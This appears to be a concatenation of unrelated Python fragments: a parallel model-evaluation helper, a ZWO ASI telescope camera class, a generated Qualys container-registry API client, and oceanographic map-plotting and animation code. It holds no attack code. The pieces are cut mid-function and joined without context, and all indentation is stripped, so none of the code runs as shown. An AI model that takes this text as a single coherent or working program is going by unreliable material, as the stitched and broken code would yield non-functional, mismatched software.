Warning
-------
pool.map serializes each argument and so if model is a class,
any of its member variables that are updated in __call__ will not
persist once each __call__ to pool completes.
"""
num_samples = samples.shape[1]
if assert_omp and max_eval_concurrency > 1:
if ('OMP_NUM_THREADS' not in os.environ or
not int(os.environ['OMP_NUM_THREADS']) == 1):
msg = 'User set assert_omp=True but OMP_NUM_THREADS has not been '
msg += 'set to 1. Run script with '
msg += 'OMP_NUM_THREADS=1 python script.py'
raise Exception(msg)
if pool is None:
pool_given = False
pool = Pool(max_eval_concurrency)
else:
pool_given = True
result = pool.map(
model, [(samples[:, ii:ii+1]) for ii in range(samples.shape[1])])
if pool_given is False:
pool.close()
# result = [model(samples[:, ii:ii+1]) for ii in range(samples.shape[1])]
num_qoi = result[0].shape[1]
values = np.empty((num_samples, num_qoi))
for ii in range(len(result)):
values[ii, :] = result[ii][0, :]
return values
def time_function_evaluations(function, samples):
vals = []
times = []
for ii in range(samples.shape[1]):
t0 = time.time()
val = function(samples[:, ii:ii+1])[0, :]
t1 = time.time()
vals.append(val)
times.append([t1-t0])
vals = np.asarray(vals)
times = np.asarray(times)
return np.hstack([vals, times])
class TimerModelWrapper(object):
def __init__(self, function, base_model=None):
self.function_to_time = function
self.base_model = base_model
def x__getattr__(self, name):
"""
Cannot get following to work
If defining a custom __getattr__ it seems I cannot have member
variables with the same name in this class and class definition
of function
if self.function is itself a model object allow the access of
self.function.name using self.name
Note __getattr__
will be invoked on python objects only when the requested
attribute is not found in the particular object's space.
"""
if hasattr(self.function_to_time, name):
attr = getattr(self.function_to_time, name)
return attr
raise AttributeError(
f" {self} or its member {self}.function has no attribute '{name}'")
def __call__(self, samples):
return time_function_evaluations(self.function_to_time, samples)
class WorkTracker(object):
"""
Store the cost needed to evaluate a function under different
configurations, | |
<gh_stars>1-10
"""Cameras for use in telescope tracking control loop.
A set of classes that inherit from the abstract base class Camera, providing a common API for
interacting with cameras. The main application for a camera relevant to this package is as a
sensor to be paired with computer vision algorithms that can estimate the position error of a
target.
"""
from abc import ABC, abstractmethod
from typing import Tuple
from math import inf
import enum
import os
import time
import fcntl
import select
import mmap
import errno
import ctypes
import numpy as np
import v4l2
from configargparse import Namespace
import cv2
import asi
from asi import ASICheck, ASIError
from track.config import ArgParser
class Camera(ABC):
"""Abstract base class for cameras"""
@property
@abstractmethod
def pixel_scale(self) -> float:
"""Field of view of a single pixel.
This is a property of the camera, the optical system to which it is attached. The value
returned should be correct for the size of the physical photosites in the camera sensor,
which may be different from the effective size of pixels returned by get_frame() if binning
is enabled.
Returns:
Scale of a pixel in degrees per pixel.
"""
@property
@abstractmethod
def binning(self) -> int:
"""Binning configuration.
Many cameras support binning of multiple physical photosites in a square grid into a single
value as if they were a single photosite. The binning number is the number of photosites
on each side of such a grid, so a binning of 2 means photosites are grouped into 2x2 grids
of four photosites each. A binning value of 1 means that no binning is applied and all
photosites are preserved.
Returns:
Binning number.
"""
@property
@abstractmethod
def field_of_view(self) -> Tuple[float, float]:
"""Field of view of the camera.
This is a function of the camera physical sensor size and the focal length of the optical
system to which it is attached.
Returns:
A tuple (height, width) giving the field of view in degrees.
"""
@property
@abstractmethod
def frame_shape(self) -> Tuple[int, int]:
"""Dimensions of the frame in pixels.
This should be identical to the .shape property of the arrays returned by get_frame(). It
should therefore account for any processing that occurs between the camera sensor and
get_frame() that alters the resolution such as binning or region of interest (ROI).
Returns:
Resolution as a tuple of (height, width) in pixels.
"""
@property
@abstractmethod
def video_mode(self) -> bool:
"""Indicate if camera is in video mode.
Returns:
True if the camera is in video mode. False otherwise.
"""
@video_mode.setter
@abstractmethod
def video_mode(self, enabled: bool) -> None:
"""Enable or disable video mode if camera supports this.
Raises:
ValueError if the camera does not support the requested mode.
"""
@abstractmethod
def get_frame(self, timeout: float = inf) -> np.ndarray:
"""Get a frame from the camera.
This method should return the latest frame from the camera. It should be implemented such
that the same frame is not returned more than once. If no new frame is available since the
previous call it should block until either a new frame arrives or the timeout expires. If
multiple frames have arrived since the last call only the most recent should be returned
and the others should be dropped. It is the responsibility of the caller to call frequently
enough to avoid dropping frames if frame loss is a problem.
Args:
timeout: How long to wait for a frame in seconds.
Returns:
Latest frame from the camera or None if the timeout expires before a frame arrives. The
shape of the array should match the frame_shape property.
"""
@staticmethod
@abstractmethod
def add_program_arguments(parser: ArgParser, profile: str) -> None:
"""Adds program arguments specific to this camera.
This method should add program arguments required by this camera to the passed-in ArgParser
instance.
"""
class CameraTimeout(Exception):
"""Raised when a timeout expires"""
class ASICamera(Camera):
"""ZWO ASI Cameras"""
class BitDepth(enum.IntEnum):
"""Bit depth of pixels."""
RAW8 = asi.ASI_IMG_RAW8
RAW16 = asi.ASI_IMG_RAW16
def bytes_per_pixel(self) -> int:
"""Number of bytes per pixel in raw array of frame data retrieved from ASI driver"""
return 1 if self == self.RAW8 else 2
@staticmethod
def add_program_arguments(parser: ArgParser, profile: str) -> None:
"""Adds program arguments for ZWO ASI camera configuration.
Args:
parser: The instance of ArgParser to which this function will add arguments.
profile: 'track' or 'align' to indicate which set of arguments to add.
Raises:
ValueError if profile is set to an invalid string.
"""
if profile == 'align':
parser.add_argument(
'--zwo-exposure-time-align',
help='ZWO camera exposure time used during alignment in seconds',
default=0.5,
type=float
)
parser.add_argument(
'--zwo-gain-align',
help='ZWO camera gain used during alignment',
default=400,
type=int
)
elif profile == 'track':
parser.add_argument(
'--zwo-exposure-time',
help='ZWO camera exposure time used during tracking in seconds',
default=0.03,
type=float
)
parser.add_argument(
'--zwo-gain',
help='ZWO camera gain used during tracking',
default=10,
type=int
)
else:
ValueError('profile must be "track" or "align"')
parser.add_argument(
'--zwo-binning',
help='ZWO camera binning',
default=4,
type=int
)
parser.add_argument(
'--zwo-name',
help='ZWO camera name (use to select between multiple connected cameras)',
type=str
)
@staticmethod
def from_program_args(args: Namespace, profile: str) -> 'ASICamera':
"""Factory to make a WebCam instance from program arguments
Args:
args: Set of program arguments.
profile: Set to 'tracking' to use the tracking gain and exposure time or to 'align' to
use the alignment gain and exposure time.
Returns:
An instance of ASICamera initialized with the appropriate configuration.
Raises:
ValueError if profile is set to an invalid string.
"""
camera = ASICamera(
pixel_scale=args.camera_pixel_scale / 3600.0,
binning=args.zwo_binning,
name=args.zwo_name,
)
if profile == 'track':
camera.exposure = args.zwo_exposure_time
camera.gain = args.zwo_gain
camera.video_mode = True
elif profile == 'align':
camera.exposure = args.zwo_exposure_time_align
camera.gain = args.zwo_gain_align
camera.video_mode = False
else:
raise ValueError('profile must be "track" or "align"')
return camera
def __init__(
self,
pixel_scale: float,
binning: int = 1,
video_mode: bool = False,
name: str = None,
):
"""Initialize and configure ZWO ASI camera.
Args:
pixel_scale: Scale of a pixel in degrees per pixel before binning.
binning: Camera binning.
video_mode: False for one-shot mode, True for video mode.
name: Connect only to a camera where the Name member of the info struct matches this
string. If None the name is not checked and the first camera is used. Note that
multiple cameras could have the same Name; when this is the case, this constructor
will connect to the first camera having a Name that matches.
Raises:
ASIError for any camera related problems.
"""
num_connected = asi.ASIGetNumOfConnectedCameras()
if num_connected == 0:
raise ASIError('No cameras connected')
# find the right camera
self.info = None
for idx in range(num_connected):
# pylint does not seem to handle SWIG bindings perfectly
# pylint: disable=no-value-for-parameter
info = ASICheck(asi.ASIGetCameraProperty(idx))
if name is None or name == info.Name:
self.info = info
break
if self.info is None:
raise ASIError(f'Could not find a camera with name "{name}"')
self._pixel_scale = pixel_scale
self._binning = binning
width = self.info.MaxWidth // binning
height = self.info.MaxHeight // binning
self._frame_shape = (height, width)
ASICheck(asi.ASIOpenCamera(self.info.CameraID))
ASICheck(asi.ASIInitCamera(self.info.CameraID))
ASICheck(asi.ASISetControlValue(self.info.CameraID, asi.ASI_MONO_BIN, 1, asi.ASI_FALSE))
ASICheck(
asi.ASISetControlValue(
self.info.CameraID,
asi.ASI_BANDWIDTHOVERLOAD,
94,
asi.ASI_FALSE
)
)
self.video_mode = video_mode
def __del__(self):
if hasattr(self, 'info') and self.info is not None:
ASICheck(asi.ASICloseCamera(self.info.CameraID))
def _set_ctrl(self, ctrl, value: int):
# auto mode always disabled since we generally don't trust it
ASICheck(asi.ASISetControlValue(self.info.CameraID, ctrl, value, asi.ASI_FALSE))
def _get_ctrl(self, ctrl):
return ASICheck(asi.ASIGetControlValue(self.info.CameraID, ctrl))
@property
def pixel_scale(self) -> float:
"""Scale of a pixel in degrees per pixel"""
return self._pixel_scale
@property
def binning(self) -> int:
"""Binning configuration"""
return self._binning
@property
def frame_shape(self) -> Tuple[int, int]:
"""Shape of array returned by get_frame()"""
return self._frame_shape
@property
def field_of_view(self) -> Tuple[float, float]:
"""Field of view of the camera (height, width) in degrees."""
return (self._pixel_scale * self.info.MaxHeight, self._pixel_scale * self.info.MaxWidth)
@property
def video_mode(self) -> bool:
"""True if video mode is enabled"""
return self._video_mode
@video_mode.setter
def video_mode(self, enabled: bool) -> None:
"""Enable or disable video mode"""
self._bit_depth = self.BitDepth.RAW8 if enabled else self.BitDepth.RAW16
height, width = self._frame_shape
self._frame_size_bytes = width * height * self._bit_depth.bytes_per_pixel()
ASICheck(
asi.ASISetROIFormat(self.info.CameraID,
width,
height,
self._binning,
self._bit_depth)
)
if enabled:
ASICheck(
asi.ASISetControlValue(
self.info.CameraID,
asi.ASI_HIGH_SPEED_MODE,
1,
asi.ASI_FALSE
)
)
ASICheck(asi.ASIStartVideoCapture(self.info.CameraID))
else:
ASICheck(
asi.ASISetControlValue(
self.info.CameraID,
asi.ASI_HIGH_SPEED_MODE,
0,
asi.ASI_FALSE
)
)
ASICheck(asi.ASIStopVideoCapture(self.info.CameraID))
self._video_mode = enabled
@property
def | |
noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/registry', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registries', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cs_registry_details(self, registry_id, **kwargs): # noqa: E501
"""Show details of a registry # noqa: E501
Show details of a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_details(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID/UUID of the registry you want to fetch the details. (required)
:return: RegistryDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cs_registry_details_with_http_info(registry_id, **kwargs) # noqa: E501
else:
(data) = self.get_cs_registry_details_with_http_info(registry_id, **kwargs) # noqa: E501
return data
def get_cs_registry_details_with_http_info(self, registry_id, **kwargs): # noqa: E501
"""Show details of a registry # noqa: E501
Show details of a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_details_with_http_info(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID/UUID of the registry you want to fetch the details. (required)
:return: RegistryDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cs_registry_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params or
params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `get_cs_registry_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryId'] = params['registry_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/registry/{registryId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RegistryDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cs_registry_repositories(self, registry_id, **kwargs): # noqa: E501
"""Show a list of repositories in a registry # noqa: E501
Show a list of repositories in a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_repositories(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the repositories. (required)
:param str filter: Filter the repository list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Repositories
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cs_registry_repositories_with_http_info(registry_id, **kwargs) # noqa: E501
else:
(data) = self.get_cs_registry_repositories_with_http_info(registry_id, **kwargs) # noqa: E501
return data
def get_cs_registry_repositories_with_http_info(self, registry_id, **kwargs): # noqa: E501
"""Show a list of repositories in a registry # noqa: E501
Show a list of repositories in a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_repositories_with_http_info(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the repositories. (required)
:param str filter: Filter the repository list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Repositories
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id', 'filter', 'page_number', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cs_registry_repositories" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params or
params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `get_cs_registry_repositories`") # noqa: E501
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryId'] = params['registry_id'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_number' in params:
query_params.append(('pageNumber', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/registry/{registryId}/repository', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Repositories', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cs_registry_schedules(self, registry_id, **kwargs): # noqa: E501
"""Show a list of schedules created for a registry # noqa: E501
Show a list of schedules created for a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_schedules(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the schedules. (required)
:param str filter: Filter the schedules list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Schedules
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cs_registry_schedules_with_http_info(registry_id, **kwargs) # noqa: E501
else:
(data) = self.get_cs_registry_schedules_with_http_info(registry_id, **kwargs) # noqa: E501
return data
def get_cs_registry_schedules_with_http_info(self, registry_id, **kwargs): # noqa: E501
"""Show a list of schedules created for a registry # noqa: E501
Show a list of schedules created for a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_schedules_with_http_info(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the schedules. (required)
:param str filter: Filter the schedules list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Schedules
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id', 'filter', 'page_number', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cs_registry_schedules" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params or
params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `get_cs_registry_schedules`") # noqa: E501
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryId'] = params['registry_id'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', | |
transform=ax[cik].transAxes,horizontalalignment='right',verticalalignment='top',fontsize=10)
else:
ax[cik].text(0,0.9,' S',transform=ax[cik].transAxes,horizontalalignment='left',verticalalignment='top',fontsize=10)
ax[cik].text(1,0.9,' N',transform=ax[cik].transAxes,horizontalalignment='right',verticalalignment='top',fontsize=10)
if platform[ri].lat.values[0] > platform[ri].lat.values[-1]:
ax[cik].invert_xaxis()
cik = cik +1
#return ax
def plot_map_view(sadcp=None, ctd_data=None, glider_track=None, ladcp_data=None, scanfish_data=None, scan_sadcp=None, ctd_ladcp=None,
topo=None,sst_map=None,sst_map1=None,ssh_name='sst',x_lim=[0,180]):
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from oceans.datasets import etopo_subset
from oceans.sw_extras import gamma_GP_from_SP_pt
from matplotlib.patches import Polygon
import gsw
from matplotlib import animation, rc
from IPython.display import HTML
import pandas as pd
# Stations map.
fig, ax = plt.subplots(ncols = 2, sharey=True, figsize=(15,8))
sst_range = np.array((15,19))
ssh_range = np.array((0.25,0.4))
Ro_range = np.array((-0.4,0.4))
lat_1, lat_2, lon_0, lat_0 =-25.,-27.5,10,-27.5,
lat_1, lat_2, lon_0, lat_0 =-25.,-27.5,13,-26,
for si in np.array((0,1)):
# setup map
m = Basemap(width=450000,height=300000,resolution='i',projection='aea',lon_0=lon_0,lat_0=lat_0)
m.ax = ax[si]
m.drawcoastlines(), m.fillcontinents(color='0.85')
m.drawparallels(np.arange(-90.,91.,1.),labels=[True,False,False,False],dashes=[2,2]), m.drawmeridians(np.arange(-180.,181.,1.),labels=[False,False,False,True],dashes=[2,2])
# add contour lines of bathymetry
lon2, lat2 = np.meshgrid(topo.lon.values,topo.lat.values)
#m.contourf(lon2, lat2,topo.Band1,40,cmap=plt.cm.Blues_r,latlon=True)
m.contour(lon2, lat2,topo.Band1,5,linestyles='solid',linewidths=1.,colors='0.35',latlon=True)
if si == 0:
# === SST MAP ===
lon2, lat2 = np.meshgrid(sst_map.lon.values,sst_map.lat.values)
#m.contourf(lon2, lat2, sst_map.analysed_sst[0,:,:],40,cmap=plt.cm.coolwarm,latlon=True)
sst_plt = m.pcolormesh(lon2, lat2, sst_map.sst,vmin=sst_range[0],vmax=sst_range[1],cmap=plt.cm.coolwarm,latlon=True)
plt.text(1,1,sst_map.time_coverage_start[:-8],transform=m.ax.transAxes,horizontalalignment='right',verticalalignment='bottom')
else:
# === SSH MAP ===
#m.contourf(lon2, lat2, sst_map1.analysed_sst[0,:,:],40,cmap=plt.cm.coolwarm,latlon=True)
lon2, lat2 = np.meshgrid(sst_map1.lon_left.values,sst_map1.lat_left.values)
Ro_plt = m.pcolormesh(lon2, lat2, sst_map1.Ro,vmin=Ro_range[0],vmax=Ro_range[1],cmap=plt.cm.coolwarm,latlon=True)
lon2, lat2 = np.meshgrid(sst_map1.lon.values,sst_map1.lat.values)
ssh_plt = m.contour(lon2, lat2, sst_map1.adt,5,linestyles='solid',linewidths=2.,colors='0.01',latlon=True)
ssh_date = pd.Series(sst_map1.time.values)
plt.text(1,1,(str(ssh_date[0].year)+'-'+str(ssh_date[0].month)+'-'+str(ssh_date[0].day)),
transform=m.ax.transAxes,horizontalalignment='right',verticalalignment='bottom')
# === SSH MAP ===
#lon2, lat2 = np.meshgrid(ssh_map.lon.values,ssh_map.lat.values)
#ssh_plt = m.contour(lon2, lat2, ssh_map.sla[0,:,:],vmin=ssh_range[0],vmax=ssh_range[1],colors='0.5',latlon=True) #
#plt.text(0,1,ssh_map.time_coverage_start[:-4],transform=m.ax.transAxes,horizontalalignment='left',verticalalignment='bottom')
#if hasattr(sst_map1, 'ugos'):
# add Geostrophic current vectors
gos_plt = m.quiver(lon2, lat2, sst_map1.ugos,sst_map1.vgos,latlon=True)#,scale=700)
# make quiver key.
qk = plt.quiverkey(gos_plt, 0.8, 0.8, 0.1, '0.1 m/s', labelpos='W')
if sadcp is not None:
# plot ship track from SADCP data
m.plot(sadcp.lon.values, sadcp.lat.values,'-',color='0.55', latlon=True)
if ctd_data is not None:
# plot ladcp/ctd stations
m.plot(ctd_data.lon.values, ctd_data.lat.values, 'ko', latlon=True)
#m.plot(ladcp_data.lon.values, ladcp_data.lat.values, 'b.', latlon=True)
if glider_track is not None:
# plot glider track
m.plot(glider_track[0,:].values, glider_track[1,:].values, color='#3cb371',lw=2, latlon=True)
# plot sections that are used below
if ctd_ladcp is not None:
for ri in range(len(ctd_ladcp)):
m.plot(ctd_ladcp[ri].lon.dropna('xy').values,ctd_ladcp[ri].lat.dropna('xy').values, '.', color= 'chartreuse', latlon=True)
if si == 0:
skip=1
ladcp_plt = m.quiver(ctd_ladcp[ri].lon.dropna('xy')[::skip].values, ctd_ladcp[ri].lat.dropna('xy')[::skip].values,
ctd_ladcp[ri].u.sel(z=ctd_ladcp[ri].z[-5]).dropna('xy')[::skip].values,
ctd_ladcp[ri].v.sel(z=ctd_ladcp[ri].z[-5]).dropna('xy')[::skip].values,
latlon=True)
# make quiver key.
qk = plt.quiverkey(ladcp_plt, 0.9, 0.9, 0.1, '0.1 m/s', labelpos='W')
start_end_date = pd.Series([ctd_ladcp[0].time[0].values,ctd_ladcp[-1].time[-1].values])
if scan_sadcp is not None:
for ri in range(len(scan_sadcp)):
m.plot(scan_sadcp[ri].lon.dropna('xy').values,scan_sadcp[ri].lat.dropna('xy').values, lw = 4, color= 'SlateGrey', latlon=True)
if si == 0:
skip=5
sadcp_plt = m.quiver(scan_sadcp[ri].lon.dropna('xy')[::skip].values, scan_sadcp[ri].lat.dropna('xy')[::skip].values,
scan_sadcp[ri].u.sel(z=scan_sadcp[ri].z[-5]).dropna('xy')[::skip].values,
scan_sadcp[ri].v.sel(z=scan_sadcp[ri].z[-5]).dropna('xy')[::skip].values,
latlon=True)
# make quiver key.
qk = plt.quiverkey(sadcp_plt, 0.9, 0.9, 0.1, '0.1 m/s', labelpos='W')
start_end_date = pd.Series([scan_sadcp[0].time[0].values,scan_sadcp[-1].time[-1].values])
m.drawmapscale(14.5, -25.5, 15, -25.5, 50,barstyle='fancy')
#if si == 0:
# plt.colorbar(sst_plt)#, ticks=[-0.5, 0, 0.5])
#else:
# plt.colorbar(ssh_plt)#, ticks=[-0.5, 0, 0.5])
if si == 0:
# add inset showing globe
add_globalmap_inset(m)
# date range of data being plotted
if scan_sadcp is not None or ctd_ladcp is not None:
plt.text(0,1,(str(start_end_date[0].year)+'-'+str(start_end_date[0].month)+'-'+str(start_end_date[0].day)+':'+str(start_end_date[1].month)+'-'+str(start_end_date[1].day)),
transform=m.ax.transAxes,horizontalalignment='left',verticalalignment='bottom')
def make_movie_ship_tracks(topo,sadcp,ladcp_data):
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from oceans.datasets import etopo_subset
from oceans.sw_extras import gamma_GP_from_SP_pt
from matplotlib.patches import Polygon
import gsw
from matplotlib import animation, rc
from IPython.display import HTML
fig, ax = plt.subplots(figsize=(15,8))
lat_1, lat_2, lon_0, lat_0 =-25.,-27.5,10,-27.5,
lat_1, lat_2, lon_0, lat_0 =-25.,-27.5,13,-26,
# setup map
m = Basemap(width=450000,height=300000,resolution='i',projection='aea',lon_0=lon_0,lat_0=lat_0)
m.ax = ax
m.drawcoastlines(), m.fillcontinents(color='0.85')
m.drawparallels(np.arange(-90.,91.,1.),labels=[True,False,False,False],dashes=[2,2]), m.drawmeridians(np.arange(-180.,181.,1.),labels=[False,False,False,True],dashes=[2,2])
# add contour lines of bathymetry
lon2, lat2 = np.meshgrid(topo.lon.values,topo.lat.values)
m.contourf(lon2, lat2,topo.Band1,40,cmap=plt.cm.Blues_r,latlon=True)
quad1b = m.plot(sadcp.lon.values[0], sadcp.lat.values[0],'ok',latlon=True,alpha=0.5)
quad1c = m.plot(sadcp.lon.values[0], sadcp.lat.values[0],'ok',latlon=True,alpha=0.5)
#timelabel = m.text(0.1,1, "",horizontalalignment='left', verticalalignment='bottom', transform=ax.transAxes)
timelabel = plt.text(1,1,"",transform=m.ax.transAxes,horizontalalignment='right',verticalalignment='bottom')
# initialization function: plot the background of each frame
# plots the parts of the image that don’t change between frames, and adds all of the parts that will change to the axes of this image
def init():
#quad1.set_array([])
#quad1b.set_array([])
#quad1c.set_array([])
return quad1b,quad1c,
# animation function. This is called sequentially
# The function will automatically get passed one argument: the frame number currently being generated.
# Additional arguments can be specified using the fargs argument in FuncAnimation.
dt_advance = 10 # how many timesteps to advance each image
t_start = 500
t_end = sadcp.lon.shape[0]
color_idx = np.linspace(0, 1, int(np.ceil((sadcp.lon.shape[0]-t_start)/dt_advance)))
def animate(t):
marker_style = dict(color=plt.cm.plasma(color_idx[int(t/dt_advance)]), linestyle='none', marker='.',
markersize=12, markerfacecolor=plt.cm.plasma(color_idx[int(t/dt_advance)]), alpha=0.5)
t_plot = t_start + t
timelabel.set_text('t = %s' %sadcp.time[t_plot].values)
quad1c[0] = m.plot(sadcp.lon.values[t_plot-dt_advance:t_plot], sadcp.lat.values[t_plot-dt_advance:t_plot],'-',color='0.65',lw=2,latlon=True,alpha=0.5)
# plot ladcp/ctd stations
if t == 0:
ind_pts_to_plot = ladcp_data.time <= sadcp.time[t_plot]
else:
ind_pts_to_plot = np.logical_and(ladcp_data.time <= sadcp.time[t_plot],ladcp_data.time > sadcp.time[t_plot-dt_advance]).values
quad1b[0] = m.plot(ladcp_data.lon.values[ind_pts_to_plot], ladcp_data.lat.values[ind_pts_to_plot],latlon=True,**marker_style)
return quad1b,quad1c,timelabel,
# call the animator. blit=True means only re-draw the parts that have changed.
# fargs are the other inputs
anim1 = animation.FuncAnimation(fig, animate, init_func=init,
frames=np.arange(0,t_end-t_start,dt_advance), interval=150) # blank with blit; bigger interval slows it down
return(anim1)
def map_limits(m):
from mpl_toolkits.basemap import Basemap
llcrnrlon = min(m.boundarylons)
urcrnrlon = max(m.boundarylons)
llcrnrlat = min(m.boundarylats)
urcrnrlat = max(m.boundarylats)
return llcrnrlon, urcrnrlon, llcrnrlat, urcrnrlat
#def make_map(llcrnrlon=10, urcrnrlon=16, llcrnrlat=22, urcrnrlat=28,
# projection='merc', resolution='i', figsize=(6, 6), inset=True):
# m = Basemap(llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,
# llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,
# projection=projection, resolution=resolution)
#def make_map(ax, lat_1=-20.,lat_2=-32,lon_0=13,lat_0=-25,
# projection='merc', resolution='i', figsize=(6, 6), inset=True):
# m = Basemap(llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,
# llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,
# projection=projection, resolution=resolution)
# m = Basemap(width=650000,height=550000,resolution='i',projection='aea',lat_1=lat_1,lat_2=lat_2,lon_0=lon_0,lat_0=lat_0)
#fig, ax = plt.subplots(figsize=figsize)
#m.drawstates()
# m.drawcoastlines()
# m.fillcontinents(color='0.85')
# meridians = np.arange(llcrnrlon, urcrnrlon + 2, 2)
# parallels = np.arange(llcrnrlat, urcrnrlat + 1, 1)
# m.drawparallels(parallels, linewidth=0, labels=[1, 0, 0, 0])
# m.drawmeridians(meridians, linewidth=0, labels=[0, 0, 0, 1])
# m.drawparallels(np.arange(-90.,91.,1.),labels=[True,True,False,False],dashes=[2,2])
# m.drawmeridians(np.arange(-180.,181.,1.),labels=[False,False,False,True],dashes=[2,2])
# m.ax = ax
def add_globalmap_inset(m):
